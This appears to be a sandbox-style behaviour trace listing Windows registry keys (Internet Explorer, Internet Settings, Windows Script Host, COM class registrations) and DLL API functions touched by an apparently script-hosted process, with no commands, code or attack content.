HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\IgnoreUserSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Timeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\ScriptEngine\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JScript\CLSID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\DA0C75D6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\DeviceDesc
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\ConfigFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2476309959-3960023044-3115063449-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaxSxSHashCount
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
cryptbase.dll.SystemFunction036
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
kernel32.dll.HeapSetInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid
dwmapi.dll.DwmIsCompositionEnabled
ole32.dll.CoCreateInstance
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
ole32.dll.CoGetObjectContext
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
oleaut32.dll.#500
userenv.dll.CreateEnvironmentBlock
sechost.dll.ConvertSidToStringSidW
sspicli.dll.GetUserNameExW
userenv.dll.DestroyEnvironmentBlock
ole32.dll.CLSIDFromOle1Class
clbcatq.dll.GetCatalogObject
clbcatq.dll.GetCatalogObject2
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
wininet.dll.DllGetClassObject
wininet.dll.DllCanUnloadNow
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
api-ms-win-downlevel-ole32-l1-1-0.dll.CoImpersonateClient
api-ms-win-downlevel-ole32-l1-1-0.dll.CoRevertToSelf
api-ms-win-downlevel-advapi32-l1-1-0.dll.GetTokenInformation
api-ms-win-downlevel-advapi32-l1-1-0.dll.CopySid
api-ms-win-downlevel-advapi32-l1-1-0.dll.EqualSid
